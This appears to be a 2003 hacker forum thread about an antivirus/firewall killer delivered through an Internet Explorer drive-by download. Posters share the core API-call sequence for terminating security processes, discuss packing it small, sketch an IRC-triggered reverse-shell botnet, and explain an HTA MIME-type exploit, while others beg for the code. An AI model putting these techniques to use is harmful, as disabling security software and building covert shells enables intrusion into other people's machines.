http://illmob.netfirms.com/aim.html this will donwload and execute my new firewall / antivirus killer (only 4.87kb made in assembly) and it will execute it without norton picking up the script as a virus before the page is even opened
clubfed
Oct 1 2003, 12:23 PM
I did something like this about two months ago - which is half of why I have had the most advanced owning technique -- I rooted several *dozen* well-known hackers with similar code (and I scored a great deal of unreleased 0day exploits this way)(ironically including an unreleased *new* IE exploit). I wrote my own AV/FW killer in win32asm that also downloads a larger more advanced egg. The advanced code can circumvent even application proxy gateways and some hardware firewalls (if you are familiar with configuring these, you know the _certain_ traffic I'm refering to that can't really be blocked and protocol inspecting is impossible).
However I think it's amoral and truly a *bad idea* to just spoon-feed others with less skill and give them this much power without them learning how to do it for themselves. Think of some malicious and angry person who comes here and grabs this code and goes and roots your mother, or other family members, or your friends, or some company/group/etc you like and care about. More skill doesn't always equate with more responsibility, but truly handing out packaged weapons to the uninitiated is just begging for disaster.
Illwill, please reconsider packaging bugtraq exploits for the masses. The problem is bad enough as it is. If people can't figure this stuff out, then thank goodness! This bug will last for years (in some cases) so let them catch the scraps!
For your consideration,
illwill
Oct 1 2003, 12:54 PM
ok well said. removed the page.
cartman
Oct 1 2003, 01:14 PM
stupid
illwill
Oct 1 2003, 11:29 PM
yes im so hurt by someone who names himself after a fat cartoon character
mortello
Oct 2 2003, 02:51 AM
I do not know how to do such app, but I must admit this is a great idea (to remove) since I don't think I should be able to use such powerful tool
Use it for you....at least you wont have lost it entirely
zadium
Oct 2 2003, 04:32 AM
can u kindly send the exploit this way send it to mumin786@hotmail.com cheers
gravyboy
Oct 2 2003, 05:55 AM
Argh, what about us that understand it and want a look?! I got home from work looking forward to see what you had done and now its gone!
I thought this was the purpose of this forum.
Is there some kind of other way I can see it? is it the same as the Iexplorer windows media thing posted last week?.
I would appeciate a PM with another link or the code if its not to much trouble.
-gravyboy
illwill
Oct 2 2003, 01:36 PM
yea it was the media one
gravyboy
Oct 2 2003, 04:58 PM
Thanks
atf
Oct 2 2003, 07:36 PM
PM the info here too, i just dont want to go through 100post to see the gory details
Yorn
Oct 2 2003, 08:33 PM
QUOTE
yes im so hurt by someone who names himself after a fat cartoon character
well put.
What ASM utilities do you use? And how big is it after UPX?
clubfed
Oct 2 2003, 09:58 PM
To answer the question about size, I don't use upx, I use fsg:
The "large" size is because of all the strings for the various av/fw out there.
My killing technique is not amazing, it's pretty standard: invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0 ... invoke OpenProcess, PROCESS_TERMINATE, 0, Process.th32ProcessID invoke TerminateProcess, eax, 0
toska
Oct 3 2003, 04:39 AM
can someone PM the info here too. Thanks
Yorn
Oct 3 2003, 01:25 PM
QUOTE (clubfed @ Oct 2 2003, 09:58 PM)
The "large" size is because of all the strings for the various av/fw out there.
The large size? I'm not knocking it at all. In fact, it's the smallest one I've seen so far. I was just wondering if you used UPX to compress it. FSG is nice for ASM code since it's already pretty small. I should get a hold of you about other changes you can make to be certain it's a LONG time before they get their AV and firewall software fixed.
It's a really interesting concept and would throw all the AV software companies into a frenzy over how to deal with it. A few others have done it before, but I still consider it new cause it's never been done *right*.
illwill
Oct 3 2003, 05:50 PM
wow clubfed your code looks eerily similar to my code i released the code to last year .... http://illmob.netfirms.com/killer_src.html could i be mistaken? besides this new code i made also stops 400 service names which as you should know service exes cant be killed unless the service is stopped first.. hence the 11kb unpacked and 4.87kb packed, but dont worry this source code will be released a few weeks from now then you can make a new one for yourself.
Yorn
Oct 4 2003, 02:36 AM
QUOTE (illwill @ Oct 3 2003, 05:50 PM)
hence the 11kb unpacked and 4.87kb packed, but dont worry this source code will be released a few weeks from now then you can make a new one for yourself.
I'll probably take a look at it when you release it.
I've never really had a reason to disable AV. The way I figure it, the least amount attention I draw, the better. There's plenty of tools out there that don't get recognized and the tools I make myself *never* get recognized.
Ironically, I don't think I've ever seen an effect AV/Firewall killer *under* 5k so I'm pretty impressed with that aspect of it. Also makes me wonder how large a AV killer would be that kills just Norton and McAfee AV scanners, since those two are the most widely used on those fat corporate lines.
Illwill, have you ever thought about or made an IRC bot so users could get around firewalls and initiate the connection via IRC? I've done some theorizing on making a bot that would connect to a possible 30 or so irc chat rooms on various servers randomly. Then for the person doing the compromising they would have another bot that would connect to all 20 or so of those chat channels on IRC and just sit.
The trigger for the bot would be an "on join" reponse. If a person came into the channel the bot would automatically try to connect to that remote user on a specified port. The owner of all the bots would code his bot to listen on that same port and when he/she joins the 20 or so chat rooms, will start accepting each of those connections as they drop to shell.
I've also done some testing with coordinating bots without an IRC network in a sort of point-2-point protocol aspect. Imagine something like that being up 24/7. Yikes. Anyone could potentially use it too.
clubfed
Oct 4 2003, 06:17 PM
just kill norton and mcaffe? without any optimization, just butchering the code i have here down to those two, it's: 10/04/2003 11:14 AM 1,616 avfrown_small_nav_mcafee.exe And I'm sure that could be reduced quite a bit.
illwill
Oct 4 2003, 07:53 PM
it sure can . i get 1024 bytes or 1kb , cant beat that with a bat
toska
Oct 4 2003, 09:19 PM
anyone got the source code of illwill's page (http://illmob.netfirms.com/aim.html) befored it was removed??!??? If so, please contact me (PM). 10x!
I am hoping your new av/fw killer uses something other than exec'ing "NET" each time you kill a process... it was bad enough all those net processes when you were only killing four services in your killer.asm, but 300 would be a heavy load on the system. What are you using now? :)
what
Oct 5 2003, 06:36 PM
QUOTE
We can generally guess what is going on here. As .hta or "HTML Application" files are not binary and resemble - mechanically - HTML files, IE's check of content will be unable to return that this file is anything but safe. The second check of MIME type will see that we are requesting a safe file type... and the third check of MIME type will be from the server saying this is a HTML Application. For whatever reason, IE has ignored the returned MIME type from a security context, but paid attention to it from an execution context.
I found this here. Now that microsoft has applied the patch, exactly what does the patch do? Does it add another form of checking, deny HTML application types, or am I way off. Just wondering, because it seemed that just as i got it to work on my webserver, a patch came out, and now nothing works.
Yorn
Oct 8 2003, 04:05 AM
what,
That is for the PERL HTA exploit that I wrote. It's basically a security risk assesment that was written when this exploit first came out.
GhostCow
Oct 11 2003, 03:30 PM
iwill you can you post that AV killer it sounds like an intresting piece of code.. you got also an av killer for linux and unix firewalls?
illwill
Oct 12 2003, 03:15 AM
no just for windows and yes my new one doesnt use lazy code of shellexecutine net stop to the apps listed it enumerates which service names are running then compares it with the list of names to kill then stops that service name
Demacus
Jan 14 2004, 08:26 PM
whats up everyone, im new here just signed up a couple days ago this is my first post so if im noobish thats why. illwill ive been checkin yer site out for that last 5 - 6 months and ive been trying to grab that av/fw killer u posted about on your site, sayin it was here. just wondering if u were ever gona get it back on your site?? it sounds like a kick ass killer give me a shout. later on
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
